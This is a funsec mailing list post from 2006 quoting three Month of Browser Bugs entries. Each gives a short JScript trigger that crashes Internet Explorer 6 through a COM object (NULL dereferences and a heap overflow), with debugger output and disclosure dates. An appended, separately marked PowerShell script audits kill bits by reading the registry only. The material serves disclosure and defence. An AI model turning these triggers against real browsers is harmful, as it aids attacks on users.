funsec mailing list archives
Re: H D Moore opened Browser Fun Blog
From: "Dude VanWinkle" <dudevanwinkle () gmail com>
Date: Mon, 3 Jul 2006 16:04:14 -0400
Here are the first three FYI:

MoBB #1: ADODB.Recordset Filter Property

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The interesting thing about this bug is how the same property has to be set three different times to trigger the exception.

    a = new ActiveXObject('ADODB.Recordset');
    try { a.Filter = "AAAA" } catch(e) { }
    try { a.Filter = "AAAA" } catch(e) { }
    try { a.Filter = 0x7ffffffe; } catch(e) { }

Demonstration

    eax=001dbfdc ebx=02820e18 ecx=02821288 edx=028212a8 esi=02821288 edi=00000000
    eip=4de194f7 esp=0013ade8 ebp=0013adf0
    msado15!CSysString::operator=+0x12:
    4de194f7 3907    cmp [edi],eax    ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006. This bug has been added to the OSVDB: Microsoft IE ADODB.Recordset COM Object Filter Property NULL Dereference.

posted by hdm @ 11:27 PM

MoBB #2: Internet.HHCtrl Image Property

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug is interesting because a small heap overflow occurs each time this property is set. The bug is difficult to detect unless heap verification has been enabled in the global debug flags for iexplore.exe. The demonstration below results in a possibly exploitable heap corruption after 128 or more iterations of the property set.

    var a = new ActiveXObject("Internet.HHCtrl.1");
    var b = unescape("XXXX");
    while (b.length < 256) b += b;
    for (var i=0; i<4096; i++) { a['Image'] = b + ""; }

Demonstration

    eax=00030288 ebx=00030000 ecx=7ffdd000 edx=00030608 esi=58585850 edi=00000022
    eip=7c911f52 esp=0013afcc ebp=0013b1ec
    ntdll!RtlAllocateHeap+0x31b:
    7c911f52 8a4605    mov al,[esi+0x5]    ds:0023:58585855=??

This bug was reported to Microsoft on March 6th, 2006. This bug has been added to the OSVDB: Microsoft IE HTML Help COM Object Image Property Heap Overflow.

posted by hdm @ 9:11 AM

MoBB #3: OutlookExpress.AddressBook

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows 2000 SP4 system. It appears to have been resolved (via killbit) in a recent update to Windows XP SP2. This bug is one of many that are triggered by loading a non-ActiveX COM object from inside Internet Explorer.

    // JScript's COM constructor is ActiveXObject (the quoted text read "ActiveXControl", which does not exist)
    a = new ActiveXObject('OutlookExpress.AddressBook');

Demonstration

    eax=00000000 ebx=06622008 ecx=00000002 edx=065814e4 esi=00000000 edi=00000000
    eip=0648b2f5 esp=0012a734 ebp=0012a754
    msoe!IDwGetOption+0x78:
    0648b2f5 8b08    mov ecx,[eax]    ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006. This bug has been added to the OSVDB: Microsoft IE OutlookExpress.AddressBook COM Object NULL Dereference.

_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.
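The post notes that MoBB #3 was resolved by a kill bit. The script below is an added example (not part of the funsec message or HD Moore's MoBB entries) that lets an administrator check, on a Windows host, whether Internet Explorer's kill bit is set for each of the three COM objects named above. It resolves each ProgID to its CLSID through HKCR and then reads the "Compatibility Flags" value under the ActiveX Compatibility key, where flag 0x400 means the control will not be instantiated in the browser. The ProgID list is taken from the post; the output object's field names are this example's own choice. The script only reads the registry.

```powershell
# Added example: report IE kill-bit status for the COM objects named in the MoBB posts.
# Reads the registry only; makes no changes.

$progIds = @('ADODB.Recordset', 'Internet.HHCtrl.1', 'OutlookExpress.AddressBook')
$KillBit = 0x400   # "Compatibility Flags" bit meaning "do not instantiate this control in IE"

function Get-KillBitStatus {
    param([string]$ProgId)

    # The ProgID -> CLSID mapping is the default value of HKCR\<ProgID>\CLSID
    $clsidKey = "Registry::HKEY_CLASSES_ROOT\$ProgId\CLSID"
    if (-not (Test-Path $clsidKey)) {
        return [pscustomobject]@{ ProgId = $ProgId; Clsid = $null; Registered = $false; KillBit = $false }
    }
    $clsid = (Get-ItemProperty -Path $clsidKey).'(default)'

    # Kill bits are stored per CLSID; on 64-bit Windows the 32-bit IE view is under Wow6432Node
    $flags = 0
    $bases = @(
        'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
        'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
    )
    foreach ($base in $bases) {
        $key = Join-Path $base $clsid
        if (Test-Path $key) {
            $value = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'Compatibility Flags'
            if ($null -ne $value) { $flags = $flags -bor [int]$value }
        }
    }

    [pscustomobject]@{
        ProgId     = $ProgId
        Clsid      = $clsid
        Registered = $true
        KillBit    = (($flags -band $KillBit) -ne 0)
    }
}

# A ProgID that is not registered at all cannot be instantiated by script either,
# so "Registered = False" is also a safe state; "Registered = True, KillBit = False" is the one to review.
$progIds | ForEach-Object { Get-KillBitStatus -ProgId $_ } | Format-Table -AutoSize
```

Run it from any PowerShell prompt on the machine being audited; no elevation is needed because HKCR and the ActiveX Compatibility key are world-readable. Because the script reports the object's registration state separately from the kill bit, a host where a control has been removed entirely and one where it is present but blocked are both visible at a glance.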
Current thread:
- H D Moore opened Browser Fun Blog Juha-Matti Laurio (Jul 03)
- Re: H D Moore opened Browser Fun Blog Dude VanWinkle (Jul 03)
- Re: H D Moore opened Browser Fun Blog Dude VanWinkle (Jul 03)
- Re: H D Moore opened Browser Fun Blog Dude VanWinkle (Jul 03)
- Re: H D Moore opened Browser Fun Blog Dude VanWinkle (Jul 03)
- <Possible follow-ups>
- Re: Re: H D Moore opened Browser Fun Blog Juha-Matti Laurio (Jul 03)
- Re: H D Moore opened Browser Fun Blog Dude VanWinkle (Jul 03)